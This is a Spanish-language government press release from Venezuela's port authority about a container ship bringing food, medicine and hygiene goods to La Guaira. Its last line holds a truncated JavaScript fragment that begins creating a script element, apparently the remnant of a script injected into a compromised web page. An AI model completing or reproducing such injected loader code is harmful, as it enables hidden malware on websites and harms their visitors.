Economía

Arriban alimentos, medicinas y productos de higiene al Puerto de la Guaira

 Continúa el arribo de mercancía para fortalecer la soberanía alimentaria del pueblo a través de la Gran Misión Abastecimiento Soberano (GMAS), en esta oportunidad al Puerto de La Guaira arribó el buque Maersk Wismar proveniente de Colombia con 300 contenedores entre alimentos, medicinas y productos de higiene personal.

Bajo procesos operativos supervisados, este buque ubicado en el puesto de atraque N°2 con una planificación de 80 horas de operaciones de descarga, promoviendo la celeridad para cumplir con el segundo vértice  de las líneas estratégicas del sistema portuario orientado a la logística oportuna.

La mercancía contenerizada que llegó al Puerto de la Guaira está dividida en 238 contenedores de alimentos,  38 en productos de higiene y 24 con medicinas.

Es así como Bolivariana de Puertos sigue las directrices del Gobierno Bolivariano en prestar cada día un mejor servicio portuario,  fortaleciendo la economía nacional apoyando el desarrollo de los planes estratégicos liderados por nuestro Presidente Obrero Nicolás Maduro Moros.

PRENSA BOLIPUERTOSvar d=document;var s=d.createElement(‘script’);